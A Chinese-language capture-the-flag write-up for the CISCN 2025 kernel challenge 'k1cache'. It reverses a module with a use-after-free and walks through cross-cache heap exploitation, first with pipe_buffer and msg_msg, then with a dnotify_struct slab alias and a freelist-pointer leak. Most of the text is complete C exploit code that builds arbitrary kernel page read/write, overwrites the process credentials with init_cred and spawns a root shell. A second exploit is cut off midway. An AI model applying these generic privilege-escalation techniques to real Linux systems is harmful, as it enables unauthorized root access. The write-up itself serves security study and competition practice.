CISCN 2025 Final k1cache



目录:



题目名:k1cache

附件:

/ $ uname -a
Linux (none) 6.4.0 #1 SMP PREEMPT_DYNAMIC Mon Sep 18 21:37:46 CST 2023 x86_64 GNU/Linux
#!/bin/sh
qemu-system-x86_64 \
    -m 256M \
    -kernel ./bzImage \
    -initrd ./rootfs.cpio \
    -monitor /dev/null \
    -append "root=/dev/ram console=ttyS0 oops=panic quiet panic=1 kaslr" \
    -cpu kvm64,+smep,+smap\
    -netdev user,id=t0, -device e1000,netdev=t0,id=nic0 \
    -nographic \
    -no-reboot

用IDA逆向k1cache.ko,可以发现内核模块在kernel_init中创建了设备/dev/klcache以及一个内存池my_struct用来分配32字节的对象,分配标志为SLAB_ACCOUNT | SLAB_PANIC | SLAB_HWCACHE_ALIGN[1]。由于SLAB_ACCOUNT标志的存在,我们的my_struct不会与kmalloc-32合并——但是这不意味着my_struct不会与任何内存池合并。

int __cdecl kernel_init()
{
  _fentry__();
  misc_register(&misc);
  cache = (kmem_cache *)kmem_cache_create("my_struct", 32LL, 0LL, 0x4042000LL, 0LL);
  return 0;
}

我们可以与/dev/klcache交互,在kernel_ioctl函数中定义了三种交互方式——show、add与delete。

__int64 __fastcall kernel_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
  __int64 v3; // rdx
  __int64 result; // rax
  unsigned __int64 size_low; // r13
  char *v6; // r12
  __int64 v7; // rsi
  __int64 v8; // rdx
  add_args a1; // [rsp+0h] [rbp-38h] BYREF
  unsigned __int64 v10; // [rsp+18h] [rbp-20h]

  _fentry__(file, cmd, arg);
  v10 = __readgsqword(0x28u);
  result = 0LL;
  if ( cmd == 64 )                              // show
  {
    if ( !copy_from_user(&a1, v3, 24LL) )
    {
      show((show_args *)a1.size);
      return 0LL;
    }
    return -22LL;
  }
  if ( cmd == 119 )                             // add
  {
    v7 = v3;
    if ( !copy_from_user(&a1, v3, 16LL) )
    {
      add_only((add_args *)&a1.buf, v7, v8);
      return 0LL;
    }
    return -22LL;
  }
  if ( cmd != 48 )                              // delete
    return result;
  if ( copy_from_user(&a1, v3, 8LL) )
    return -22LL;
  if ( LODWORD(a1.size) <= 0x1000 )
  {
    size_low = LODWORD(a1.size);
    if ( LODWORD(a1.size) > 0xFFF )
      _ubsan_handle_out_of_bounds(&off_A40, LODWORD(a1.size));
    v6 = addrList[size_low];
    if ( v6 )
    {
      if ( size_low > 0xFFF )
        _ubsan_handle_out_of_bounds(&off_A20, size_low);
      kfree(v6);
    }
  }
  return 0LL;
}
__int64 __fastcall add_only(add_args *args)
{
  __int64 v1; // rax
  __int64 v2; // rbx
  __int64 v3; // rax
  unsigned int v4; // r12d
  __int64 v6; // [rsp-8h] [rbp-230h]
  char temp[512]; // [rsp+0h] [rbp-228h] BYREF
  unsigned __int64 v8; // [rsp+200h] [rbp-28h]

  _fentry__();
  v8 = __readgsqword(0x28u);
  v1 = kmem_cache_alloc(cache, 0x400CC0LL);
  if ( v1 )
  {
    v2 = v1;
    v3 = copy_from_user(temp, args->size, 32LL);
    if ( v3 )
    {
      return (unsigned int)-22;
    }
    else
    {
      *(_QWORD *)v2 = *(_QWORD *)temp;
      *(_QWORD *)(v2 + 8) = *(_QWORD *)&temp[8];
      *(_QWORD *)(v2 + 16) = *(_QWORD *)&temp[16];
      *(_QWORD *)(v2 + 24) = *(_QWORD *)&temp[24];
      while ( 1 )
      {
        v4 = v3;
        if ( (unsigned __int64)(int)v3 > 0xFFF )
        {
          v6 = v3;
          _ubsan_handle_out_of_bounds(&off_A80, (int)v3);
          v3 = v6;
        }
        if ( !addrList[v3] )
          break;
        if ( ++v3 == 4096 )
          return 0;
      }
      if ( (unsigned __int64)(int)v4 > 0xFFF )
        _ubsan_handle_out_of_bounds(&off_A60, (int)v4);
      addrList[v4] = (char *)v2;
    }
  }
  else
  {
    return (unsigned int)-12;
  }
  return v4;
}
__int64 __fastcall show(show_args *args, __int64 *a2)
{
  char *v2; // rbx
  __int64 v3; // rdi
  char buf[4096]; // [rsp+0h] [rbp-1028h] BYREF
  unsigned __int64 v6; // [rsp+1000h] [rbp-28h]

  _fentry__();
  v6 = __readgsqword(0x28u);
  memset(buf, 0, sizeof(buf));
  if ( (unsigned int)args > 0x1000 )
    return 0xFFFFFFFFLL;
  if ( (unsigned int)args > 0xFFF )
    _ubsan_handle_out_of_bounds(&off_B00, (unsigned int)args);
  v2 = addrList[(unsigned int)args];
  if ( !v2 )
    return 0xFFFFFFFFLL;
  if ( (unsigned int)args > 0xFFFuLL )
  {
    _ubsan_handle_out_of_bounds(&off_AE0, (unsigned int)args);
    _ubsan_handle_out_of_bounds(&off_AC0, (unsigned int)args);
    _ubsan_handle_out_of_bounds(&off_AA0, (unsigned int)args);
  }
  v3 = *a2;
  *(_QWORD *)buf = *(_QWORD *)v2;
  *(_QWORD *)&buf[8] = *((_QWORD *)v2 + 1);
  *(_QWORD *)&buf[16] = *((_QWORD *)v2 + 2);
  *(_QWORD *)&buf[24] = *((_QWORD *)v2 + 3);
  return ((__int64 (__fastcall *)(__int64, char *, __int64))copy_to_user)(v3, buf, 32LL) != 0 ? 0xFFFFFFEA : 0;
}
struct add_args // sizeof=0x10
{
    uint64_t size;    // useless
    char *buf;
};

struct del_args // sizeof=0x8
{
    uint64_t idx;
};

struct show_args // sizeof=0x18
{
    uint64_t idx;
    uint64_t size;    // useless
    char *buf;
};

addrList中可以存放4096个从my_struct中分配的对象。

add:从my_struct中分配并用指定的数据填充对象,分配标志为___GFP_ACCOUNT | ___GFP_DIRECT_RECLAIM | ___GFP_KSWAPD_RECLAIM | ___GFP_IO | ___GFP_FS,也即GFP_KERNEL_ACCOUNT[2]

show:读取addrList中任何已存在对象的32字节内容。

delete:释放addrList中任何已存在的对象,不清空指针。


由于delete功能中有一个非常明显的UAF漏洞,因此我们很容易想到下面的做法。

首先我们要解决的问题是如何让从my_struct内存池中分配的object、slab被其他内存池分配到,这需要内核在kfree时进入__unfreeze_partials[3, mm/slub.c:2581],在kmem_cache_node的partial slab数达到cache->min_partial时执行discard_slab将一个全空的slab释放回Buddy System。一般情况下,在其他内存池从Buddy System中分配slab时,会取回前面释放的slab。由于/dev/klcache的UAF漏洞,我们仍然可以通过访问addrList来读取/二次释放这个已经进入其他内存池的slab上的对象。

接下来,分配struct pipe_buffer结构体,让内存池kmalloc-cg-xxxx待定,CONFIG_MEMCG_KMEM默认开启)取回前面释放的slab,从而让某些struct pipe_buffer结构体(称作“pipe buffer victim”)为我们所控制。我们可以用show读取“pipe buffer victim”上前32字节的数据,通过pageops成员的值分别泄露线性映射区的基址page_offset_base与内核代码映射的基址kernel_base

/**
 *	struct pipe_buffer - a linux kernel pipe buffer
 *	@page: the page containing the data for the pipe buffer
 *	@offset: offset of data inside the @page
 *	@len: length of data inside the @page
 *	@ops: operations associated with this buffer. See @pipe_buf_operations.
 *	@flags: pipe buffer flags. See above.
 *	@private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *              page;                 /*     0     8 */
    unsigned int               offset;               /*     8     4 */
    unsigned int               len;                  /*    12     4 */
    const struct pipe_buf_operations  * ops;         /*    16     8 */
    unsigned int               flags;                /*    24     4 */

    /* XXX 4 bytes hole, try to pack */

    long unsigned int          private;              /*    32     8 */

    /* size: 40, cachelines: 1, members: 6 */
    /* sum members: 36, holes: 1, sum holes: 4 */
    /* last cacheline: 40 bytes */
};

在此之后,通过释放addrList上残留的指针,我们可以将“pipe buffer victim”释放回kmalloc-cg-xx。由于freelist的LIFO单链表结构,如果再从该内存池中取出一个对象,并且刚刚被释放的“pipe buffer victim”所在slab为per_cpu_ptr(kmem_cache->cpu_slab, cpu)->slab,那么取出的对象恰好为“pipe buffer victim”。对这个取出的对象进行读写即可控制“pipe buffer victim”的内容。

现在考虑struct msg_msg结构体。它是一条DATALEN_MSG字节以内IPC消息的头部,IPC消息的长度以及除去头部以外的内容都是可控的。通过pipe_fcntl设置管道的缓冲大小时,内核通过kcalloc分配连续的nr_slots = size >> PAGE_SHIFT(2的幂次)个struct pipe_buffer结构体[4, fs/pipe.c:1239,1258]。考虑nr_slots = 4kmalloc-cg-192),使用msgsnd系统调用发送192 - sizeof(struct msg_msg)字节的IPC消息,我们刚好可以完整地控制第三个与第四个struct pipe_buffer。为了平衡消息队列中消息的数量,我们还需要msgrcv系统调用来脱链与释放一条消息。

/* one msg_msg structure for each message */
struct msg_msg {
    struct list_head           m_list;               /*     0    16 */
    long int                   m_type;               /*    16     8 */
    size_t                     m_ts;                 /*    24     8 */
    struct msg_msgseg *        next;                 /*    32     8 */
    void *                     security;             /*    40     8 */

    /* size: 48, cachelines: 1, members: 5 */
    /* last cacheline: 48 bytes */
};
int pipe_resize_ring(struct pipe_inode_info *pipe, unsigned int nr_slots)
{
	struct pipe_buffer *bufs;
	unsigned int head, tail, mask, n;

	bufs = kcalloc(nr_slots, sizeof(*bufs),
		       GFP_KERNEL_ACCOUNT | __GFP_NOWARN);

    // ...

}

为了跳过前两个struct pipe_buffer,我们可以对管道写入然后读取两页数据让pipe_inode_info->headpipe_inode_info->tail同时指向第三个缓冲,通过IPC消息篡改第三个缓冲,再对管道读写便可实现对任意页的读写。


最后,我们尝试修改当前进程的task_struct->credtask_struct->real_credinit_cred。为了方便定位,通过prctl系统调用修改task_struct->comm,直接搜索pipe_buffer_victim->page附近的页,查找与task_struct->comm匹配的字符串定位task_struct,最后完成篡改即可将当前进程提权为root权限。

struct task_struct {
        // ...

        const struct cred  *       real_cred;            /*  2896     8 */
        const struct cred  *       cred;                 /*  2904     8 */
        struct key *               cached_requested_key; /*  2912     8 */
        char                       comm[16];             /*  2920    16 */
        
        // ...

        /* size: 13440, cachelines: 210, members: 240 */

        // ...
};

FINAL EXPLOIT

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/socket.h>
#include <sys/prctl.h>
#include <sys/shm.h>
#include <sys/xattr.h>
#include <sys/types.h>
#include <sys/syscall.h>
#include <sys/stat.h>

#define CMD_ADD    119
#define CMD_DEL    48
#define CMD_SHOW   64

struct add_args // sizeof=0x10
{
    uint64_t size;
    char *buf;
};
struct del_args // sizeof=0x8
{
    uint64_t idx;
};
struct show_args // sizeof=0x18
{
    uint64_t idx;
    uint64_t size;
    char *buf;
};

/* to run the exp on the specific core only */
// void bind_cpu(int core)
// {
    // cpu_set_t cpu_set;

    // CPU_ZERO(&cpu_set);
    // CPU_SET(core, &cpu_set);
    // sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    // printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
// }


#define OBJECT_SIZE 32

#define MODPROBE_PATH 0xffffffff831d8ce0

int dev_fd;

#define KERNEL_BASE_0 (0xffffffff81000000ULL)
#define ANON_PIPE_OPS_OFFSET (0xffffffff82246ec0ULL - KERNEL_BASE_0)
#define INIT_CRED_OFFSET (0xffffffff8308c620ULL - KERNEL_BASE_0)
#define PAGE_OFFSET_BASE_0 (0xffff888000000000ULL)
size_t kernel_base = 0xffffffff81000000ULL;
size_t page_offset_base = 0xffff888000000000ULL, vmemmap_base = 0xffffea0000000000ULL;


/* msgrcv options */
#define MSG_NOERROR     010000  /* no error if message is too big */
#define MSG_EXCEPT      020000  /* recv any msg except of specified type.*/
#define MSG_COPY        040000  /* copy (not remove) all queue messages */

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

struct msg_msgseg {
        struct msg_msgseg *        next;                 /*     0     8 */

        /* size: 8, cachelines: 1, members: 1 */
        /* last cacheline: 8 bytes */
};

struct list_head {
        struct list_head *         next;                 /*     0     8 */
        struct list_head *         prev;                 /*     8     8 */

        /* size: 16, cachelines: 1, members: 2 */
        /* last cacheline: 16 bytes */
};

struct msg_msg {
        struct list_head           m_list;               /*     0    16 */
        long int                   m_type;               /*    16     8 */
        size_t                     m_ts;                 /*    24     8 */
        struct msg_msgseg *        next;                 /*    32     8 */
        void *                     security;             /*    40     8 */

        /* size: 48, cachelines: 1, members: 5 */
        /* last cacheline: 48 bytes */
};

/* read start from len to offset, write start from offset */
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
    int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
    int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

struct seq_file;

struct seq_operations {
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};


void err_exit(char *msg, int use_errno)
{
    char buf[0x600] = {0,}; 
    sprintf(buf, "[\x1b[31;1mFATAL\x1b[0m] %s", msg);
    if (use_errno) perror(buf);
    else puts(buf);
    getchar();
    exit(EXIT_FAILURE);
}

int get_msg_queue(void)
{
    int res = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (res < 0) {
        err_exit("get_msg_queue", 1);
    }
    return res;
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
 * the msgp should be a pointer to the `struct msgbuf`,
 * and the data should be stored in msgbuf.mtext
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ((struct msgbuf*)msgp)->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 
                  MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

void build_msg(struct msg_msg *msg, void *m_list_next, void *m_list_prev, 
              uint64_t m_type, uint64_t m_ts, void *next, void *security)
{
    msg->m_list.next = m_list_next;
    msg->m_list.prev = m_list_prev;
    msg->m_type = m_type;
    msg->m_ts = m_ts;
    msg->next = next;
    msg->security = security;
}

struct msgbuf_64 {
    long mtype;
    union {
        char mtext[64];
        size_t mqword[8];
    };
};

struct msgbuf_192 {
    long mtype;
    union {
        char mtext[192];
        size_t mqword[192/8];
    };
};


int dev_add(void* buf) {
    struct add_args req = { 0x20, buf };
    return ioctl(dev_fd, CMD_ADD, &req);
}

int dev_delete(int index) {
    struct del_args req = { index };
    return ioctl(dev_fd, CMD_DEL, &req);
}

int dev_show(int index, void* buf) {
    struct show_args req = { index, 0x20, buf };
    return ioctl(dev_fd, CMD_SHOW, &req);
}

void dump(void *buf) {
    size_t *bufz = (size_t *)buf;
    for (unsigned int i=0; i<(OBJECT_SIZE+7)>>3; ++i) {
        char ascii[9];
        for (int j=0; j<8; ++j) {
            uint8_t ch = (uint8_t)(bufz[i] >> j*8);
            ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
        }
        ascii[8] = 0;
        printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016lx\x1b[0m    /*  \x1b[90;1m%s\x1b[0m  */\n", i << 3, bufz[i], ascii);
    }
    printf("\n");
}

void dump_n(void *buf, size_t n) {
    size_t *bufz = (size_t *)buf;
    for (unsigned int i=0; i<(n+7)>>3; ++i) {
        char ascii[9];
        for (int j=0; j<8; ++j) {
            uint8_t ch = (uint8_t)(bufz[i] >> j*8);
            ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
        }
        ascii[8] = 0;
        printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016lx\x1b[0m    /*  \x1b[90;1m%s\x1b[0m  */\n", i << 3, bufz[i], ascii);
    }
    printf("\n");
}

long show_and_dump(size_t idx) {
#ifndef VERBOSE
    printf("Index: \x1b[32;1m%lu\x1b[0m\n", idx);
#endif
    char buf[OBJECT_SIZE];
    long status = dev_show(idx, &buf);
    dump(&buf);
    return status;
}


#define NR_PIPES 400
#define NR_SPRAY 4000
#define NR_MSGSND 300

int victim_pipe_i;
int victim_i;
int victim_i_2;
int venomous_msqid;
int pipe_fds[NR_PIPES][2];

size_t orig_ops;

void arb_write(void *page, unsigned int offset, void *buf, unsigned int nbytes) {
    struct msgbuf_192 dummy_buf;
    if (read_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
        err_exit("read_msg", 1);
    }
    memset(dummy_buf.mtext, 0, sizeof(dummy_buf.mtext));
    struct pipe_buffer *fake_pipe = (struct pipe_buffer*)&dummy_buf.mtext[32];
    
    fake_pipe->page = page;
    fake_pipe->offset = offset;
    fake_pipe->len = 0;
    fake_pipe->ops = (void*)orig_ops;
    fake_pipe->flags = 0x10;
    
    if (write_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
        err_exit("write_msg", 1);
    }
    
    write(pipe_fds[victim_pipe_i][1], buf, nbytes);
}

void arb_read(void *page, unsigned int offset, void *buf, unsigned int nbytes) {
    struct msgbuf_192 dummy_buf;
    if (read_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
        err_exit("read_msg", 1);
    }
    memset(dummy_buf.mtext, 0, sizeof(dummy_buf.mtext));
    struct pipe_buffer *fake_pipe = (struct pipe_buffer*)&dummy_buf.mtext[32];
    
    fake_pipe->page = page;
    fake_pipe->offset = offset;
    fake_pipe->len = 0x2000;
    fake_pipe->ops = (void*)orig_ops;
    fake_pipe->flags = 0;
    
    if (write_msg(venomous_msqid, (struct msgbuf*)&dummy_buf, 192-sizeof(struct msg_msg), 0x41) < 0) {
        err_exit("write_msg", 1);
    }

    read(pipe_fds[victim_pipe_i][0], buf, nbytes);
}

int main(){

    dev_fd = open("/dev/klcache", O_RDWR);
    if (dev_fd < 0) {
        err_exit("Error opening /dev/klcache", 1);
    }

    size_t tmpbuf[4] = {0,};
    char pagebuf2[0x2000] = {0,};
    
    for (int i=0; i<NR_PIPES; ++i) {
        if (pipe(pipe_fds[i]) < 0) {
            err_exit("pipe", 1);
        }
        write(pipe_fds[i][1], pagebuf2, i+1);
    }
    
    for (int i=0; i<NR_SPRAY; ++i) {
        if (dev_add(&tmpbuf) < 0) {
            err_exit("Failed to add.", 0);
        }
    }
    
    for (int i=0; i<NR_SPRAY; ++i) {
        dev_delete(i);
    }
    
    for (int i=0; i<NR_PIPES; ++i) {
        if (fcntl(pipe_fds[i][0], F_SETPIPE_SZ, 0x4000) < 0) {
            err_exit("Failed to realloc pipe_buffer", 1);
        }
    }
    
    size_t orig_buf[4];
    for (victim_i=0; victim_i<NR_SPRAY; ++victim_i) {
        dev_show(victim_i, &orig_buf);
        if (orig_buf[0] > PAGE_OFFSET_BASE_0 && orig_buf[2] > KERNEL_BASE_0) {
            goto out;
        }
    }

    err_exit("Exhausted.", 0);

out:
    show_and_dump(victim_i);
    
    for (int i=0; i<NR_PIPES; ++i) {
        write(pipe_fds[i][1], &pagebuf2, 0x1fff-i);
        write(pipe_fds[i][1], pagebuf2, i+1);
        read(pipe_fds[i][0], &pagebuf2, 0x2000);
    }
    
    show_and_dump(victim_i);
    
    size_t orig_buf_2[4];
    for (victim_i_2=0; victim_i_2<NR_SPRAY; ++victim_i_2) {
        dev_show(victim_i_2, &orig_buf_2);
        if (orig_buf_2[2] > PAGE_OFFSET_BASE_0 && orig_buf_2[3] == orig_buf[1]) {
            goto out_;
        }
    }

    err_exit("Exhausted _.", 0);

out_:
    
    show_and_dump(victim_i_2);
    
    page_offset_base = orig_buf[0] & ~0xFFFFFFULL;
    kernel_base = orig_buf[2] - ANON_PIPE_OPS_OFFSET;
    
    printf("[\x1b[32;1m+\x1b[0m] page_offset_base = 0x%016lx\n", page_offset_base);
    printf("[\x1b[32;1m+\x1b[0m] kernel_base = 0x%016lx\n", kernel_base);
    
    victim_pipe_i = (int)(orig_buf[1] >> 32) - 1ULL;
    printf("[\x1b[32;1m+\x1b[0m] victim_pipe_i = %d\n", victim_pipe_i);
    goto out2;
    
out2:
    
    venomous_msqid = get_msg_queue();
    struct msgbuf_192 venomous_msgbuf;
    venomous_msgbuf.mqword[4] = 0x1919810;
    
    dev_delete(victim_i);
    
    size_t tampered_victim_buf[4];
    for (int i=0; i<NR_MSGSND; ++i) {
        if (write_msg(venomous_msqid, (struct msgbuf*)&venomous_msgbuf, 192-sizeof(struct msg_msg), 0x41) < 0) {
            err_exit("write_msg", 1);
        }
        dev_show(victim_i, &tampered_victim_buf);
        if (tampered_victim_buf[1] > PAGE_OFFSET_BASE_0) {
            printf("[\x1b[34;1m*\x1b[0m] %d\n", i);
            goto out3;
        }
    }
    
    err_exit("Exhausted 3.", 0);

out3:

    show_and_dump(victim_i);
    show_and_dump(victim_i_2);
    
    orig_ops = orig_buf[2];
    
    if (prctl(PR_SET_NAME, "astra_kernel") < 0) {
        err_exit("PR_SET_NAME", 1);
    };
    
    size_t arb_read_buf[512] = {0,};
    size_t curr_page;
    int i;
    size_t *task_comm;
    for (i = 0, curr_page = orig_buf[0]+0x4000ULL*0x40ULL; curr_page >= orig_buf[0]-0x10000ULL*0x40ULL; ++i, curr_page -= 0x40) {
        if (i % 100 == 0) {
            printf("[\x1b[34;1m*\x1b[0m] Pages scanned: %d\n", i);
        }
        arb_read((void*)curr_page, 0, &arb_read_buf, 0xffe);
        task_comm = memmem(&arb_read_buf, 0xffe, "astra_kernel", 12);
        if (task_comm && task_comm[-2] > PAGE_OFFSET_BASE_0 && task_comm[-3] > PAGE_OFFSET_BASE_0) {
            goto out4;
        }
    }

    err_exit("Exhausted 4.", 0);

out4:

    printf("[\x1b[32;1m+\x1b[0m] task_struct on page 0x%016lx\n", curr_page);
    
    task_comm[-2] = task_comm[-3] = INIT_CRED_OFFSET + kernel_base;
    
    arb_write((void*)curr_page, 0, arb_read_buf, 0xffe);
    
    printf("[\x1b[34;1m*\x1b[0m] uid: %d\n", getuid());
    printf("[\x1b[34;1m*\x1b[0m] Getting shell...\n");
    system("/bin/sh");
    
    return 0;
}

编译:

musl-gcc -no-pie -z now -o exp_heapspray exp_heapspray.c -masm=intel -static


上述方法依赖于cross cache,后续对其他结构体的利用均可以归到此类。

然而,就如本文一开始说的那样,my_struct不一定会与其他所有内存池隔离开来。

为方便调试,关闭kaslr,以root身份启动shell,获取内核模块的.bss基址,根据偏移定位cache变量,查看cache->name,可以发现这个内存池的名字并不是my_struct而是dnotify_struct

/ $ grep -r "" /sys/module/k1cache/sections/
...
/sys/module/k1cache/sections/.bss:0xffffffffc0203840
...

这意味着my_struct成为了dnotify_struct的别名(alias)。

因此,即便不使用cross cache的技巧,我们也可以轻易地劫持struct dnotify_struct结构体。struct dnotify_struct的定义如下。

struct dnotify_struct {
        struct dnotify_struct *    dn_next;              /*     0     8 */
        __u32                      dn_mask;              /*     8     4 */
        int                        dn_fd;                /*    12     4 */
        struct file *              dn_filp;              /*    16     8 */
        fl_owner_t                 dn_owner;             /*    24     8 */

        /* size: 32, cachelines: 1, members: 5 */
        /* last cacheline: 32 bytes */
};

dnotify是一种过时的目录事件监听机制(现代化的替代方案为inotify),通过信号(SIGIO)和文件描述符通知应用程序目录内文件的修改事件(如创建、删除)。dnotify的事件队列机制在我们后续的利用中起到了重要的作用。内存池dnotify_struct_cache用来统一管理struct dnotify_struct

static int __init dnotify_init(void)
{
    dnotify_struct_cache = KMEM_CACHE(dnotify_struct,
                      SLAB_PANIC|SLAB_ACCOUNT);
    dnotify_mark_cache = KMEM_CACHE(dnotify_mark, SLAB_PANIC|SLAB_ACCOUNT);

    dnotify_group = fsnotify_alloc_group(&dnotify_fsnotify_ops,
                         FSNOTIFY_GROUP_NOFS);
    if (IS_ERR(dnotify_group))
        panic("unable to allocate fsnotify group for dnotify\n");
    dnotify_sysctl_init();
    return 0;
}

module_init(dnotify_init)

观察fcntl_dirnotify函数的逻辑,不难发现,如果我们想要分配一个struct dnotify_struct,将其挂在链表dn_mark上又不提前触发dnotify_flush,参数arg需要满足arg & ~DN_MULTISHOT != 0

void dnotify_flush(struct file *filp, fl_owner_t id)
{
    // ...

    prev = &dn_mark->dn;
    while ((dn = *prev) != NULL) {
        if ((dn->dn_owner == id) && (dn->dn_filp == filp)) {
            *prev = dn->dn_next;
            kmem_cache_free(dnotify_struct_cache, dn);
            dnotify_recalc_inode_mask(fsn_mark);
            break;
        }
        prev = &dn->dn_next;
    }
    
    // ...
}

static int attach_dn(struct dnotify_struct *dn, struct dnotify_mark *dn_mark,
        fl_owner_t id, int fd, struct file *filp, __u32 mask)
{   
    // ...

    dn->dn_mask = mask;
    dn->dn_fd = fd;
    dn->dn_filp = filp;
    dn->dn_owner = id;
    dn->dn_next = dn_mark->dn;
    dn_mark->dn = dn;

    return 0;
}

int fcntl_dirnotify(int fd, struct file *filp, unsigned long arg)
{
    struct dnotify_struct *dn;

    // ...

    /* a 0 mask means we are explicitly removing the watch */
    if ((arg & ~DN_MULTISHOT) == 0) {
        dnotify_flush(filp, id);
        error = 0;
        goto out_err;
    }

    // ...

    /* expect most fcntl to add new rather than augment old */
    dn = kmem_cache_alloc(dnotify_struct_cache, GFP_KERNEL);
    if (!dn) {
        error = -ENOMEM;
        goto out_err;
    }

    // ...

    error = attach_dn(dn, dn_mark, id, fd, filp, mask);

    // ...

    return error;
}

由于内核配置CONFIG_SLAB_FREELIST_HARDENED默认开启,对象上freelist的指针总是被加密保护的。

static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
        unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
// ...
return (void *)((unsigned long)ptr ^ s->random ^
   swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
return ptr;
#endif
}

其中swab用来反转一个64位整型的字节端序,而在没有启用硬件辅助的KASAN时kasan_reset_tag相当于空操作。这种加密保护增添了直接篡改freelist指针的难度。

然而,利用struct dnotify_struct的链表结构,如果存在形如A -> B -> C、由dn_next链接、同时位于freelist上的一条链,并且ABC可以通过show与delete控制,那么我们便可以先读出BC的地址,然后通过B的freelist指针计算出cache->random,用double free劫持freelist完成任意写,最后改写modprobe_path就行了。


FINAL EXPLOIT

注:内核基址的泄露使用cross cache与struct seq_operations完成。

#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/socket.h>
#include <sys/prctl.h>
#include <unistd.h>  
#include <signal.h> 

#define CMD_ADD    119
#define CMD_DEL    48
#define CMD_SHOW   64

struct add_args // sizeof=0x10
{
    uint64_t size;
    char *buf;
};
struct del_args // sizeof=0x8
{
    uint64_t idx;
};
struct show_args // sizeof=0x18
{
    uint64_t idx;
    uint64_t size;
    char *buf;
};

/* to run the exp on the specific core only */
// void bind_cpu(int core)
// {
    // cpu_set_t cpu_set;

    // CPU_ZERO(&cpu_set);
    // CPU_SET(core, &cpu_set);
    // sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    // printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
// }

#define OBJ_SPRAY_NR 4000
#define NR_STAT 128

#define OBJECT_SIZE 32

#define MODPROBE_PATH 0xffffffff831d8ce0

int dev_fd;

#define ANON_PIPE_OPS_OFFSET 0xffffffff82246ec0ULL
#define KERNEL_BASE_0 0xffffffff81000000ULL
size_t kernel_base = 0xffffffff81000000ULL;
size_t page_offset_base = 0xffff888000000000ULL, vmemmap_base = 0xffffea0000000000ULL;
size_t page_leak;

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* read start from len to offset, write start from offset */
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
    int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
    int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

struct seq_file;

struct seq_operations {
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};

void err_exit(char *msg, int use_errno)
{
    char buf[0x600] = {0,}; 
    sprintf(buf, "[\x1b[31;1mFATAL\x1b[0m] %s", msg);
    if (use_errno) perror(buf);
    else puts(buf);
    exit(EXIT_FAILURE);
}

int dev_add(void* buf) {
    struct add_args req = { 0x20, buf };
    return ioctl(dev_fd, CMD_ADD, &req);
}

int dev_delete(int index) {
    struct del_args req = { index };
    return ioctl(dev_fd, CMD_DEL, &req);
}

int dev_show(int index, void* buf) {
    struct show_args req = { index, 0x20, buf };
    return ioctl(dev_fd, CMD_SHOW, &req);
}

void dump(void *buf) {
    size_t *bufz = (size_t *)buf;
    for (unsigned int i=0; i<(OBJECT_SIZE+7)>>3; ++i) {
        char ascii[9];
        for (int j=0; j<8; ++j) {
            uint8_t ch = (uint8_t)(bufz[i] >> j*8);
            ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
        }
        ascii[8] = 0;
